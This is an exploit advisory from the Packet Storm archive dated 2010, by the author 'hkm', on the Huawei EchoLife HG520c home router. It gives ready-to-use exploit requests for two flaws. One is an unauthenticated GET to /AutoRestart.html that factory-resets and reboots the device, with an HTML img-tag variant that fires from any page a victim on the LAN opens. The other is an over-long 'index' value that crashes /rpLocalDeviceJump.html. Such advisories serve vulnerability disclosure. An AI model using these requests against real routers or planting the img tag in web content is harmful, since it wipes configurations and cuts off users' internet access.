Huawei EchoLife HG520c Denial Of Service

2010-04-20T00:00:00
ID PACKETSTORM:88697
Type packetstorm
Reporter hkm
Modified 2010-04-20T00:00:00

Description

                                        
                                            `# Exploit Title: Huawei EchoLife HG520c Denial of Service and Modem Reset  
# Date: 2010-04-19  
# Author: hkm  
# Product Link: http://www.huawei.com/mobileweb/en/products/view.do?id=660  
# Firmware Versions: 3.10.18.7-1.0.7.0  
# 3.10.18.5-1.0.7.0  
# 3.10.18.4  
# Software Versions: V100R001B120Telmex  
# V100R001B121Telmex  
  
  
[Description #1]  
=================  
The page '/AutoRestart.html' restores the default configuration and reboots  
the device. This page does not require authentication.  
  
[Exploit #1]  
=================  
>From LAN or Client Side, just send a simple GET request to:  
  
http://192.168.1.254/AutoRestart.html  
  
<img src=http://192.168.1.254/AutoRestart.html>  
  
In case of having the remote interface enabled, from remote:  
  
http://<REMOTE IP>/AutoRestart.html  
______________________________________________________________________  
  
  
[Description #2]  
=================  
The page '/rpLocalDeviceJump.html' reboots the device when the 'index'  
variable value has a length of more than 7 characters. Requires  
authentication.  
  
[Exploit #2]  
=================  
  
http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS  
_____________________________________________________________________  
  
  
Greets: Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, Chito, Kike,  
House, Aldo, Chewi, Alex, Paco.  
  
  
hkm  
  
hkm@hakim.ws  
  
  
[ Comunidad Underground de Mexico - http://www.underground.org.mx ]   
`